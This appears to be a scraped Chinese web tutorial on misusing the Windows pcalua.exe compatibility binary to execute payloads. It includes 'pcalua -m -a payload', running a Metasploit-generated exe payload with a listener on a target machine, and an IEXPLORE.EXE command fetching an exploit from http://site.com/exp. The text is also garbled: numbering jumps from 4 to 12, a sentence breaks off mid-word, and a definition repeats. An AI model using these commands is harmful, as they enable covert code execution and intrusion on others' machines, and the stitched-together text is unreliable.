pcalua.exe,pcalua.exe5使用教程
pcalua.exe,pcalua.exe5使用教程
一、Pcalua介绍
1. Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。
2. 默认在C:\Windows\System32\pcalua.exe。
二、Pcalua使用
1. 命令为 Pcalua -m -a payload。
当打开进程的父进程为forfiles.exe。
2. pcalua 在Windows 7以上的版本可以尝试使用pcalua执行命令。不过实测Windows 08R2没有找到这个程序。使用-a参数执行命令。
3. pcalua.exe位置在C:\windows\system32文件夹下,该程序是系统文件,并非是一些用户说的迅雷后台下载程序。pcalua.exe是windows的系统文件,Windows程序兼容性助理(Program Compatibility Assistant)的一个组件而已。
4. 以下是PCALUA的基本用法:
1.打开命令提示符或PowerShell。
2.通过`cd`命令导航到PCALUA工具所在的文件夹。
3.使用以下命令运行PCALUA: PCALUA.exe -a
这将执行指定的安装程序。
三、实际应用
已添加环境变量,路径如下: C:\Windows\System32\pcalua.exe。实际使用 msf生成exepayload,并进行监听,进入目标机器执行如下: pcalua -m。
12. IEXPLORE.EXE 这个需要IE存在可执行命令的漏洞 eg: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp exp可以使用类似ms14_064。
13. 当使用UNC/WebDAV时候多的几种姿势。
1. 什么是pcalua.exe? pcalua.exe被称为Windows程序兼容性助手(Program Compatibility Assis。
- 上一篇:sql数据库修复,sql数据库修复软件
- 下一篇:mm洗衣服,洗衣服大妈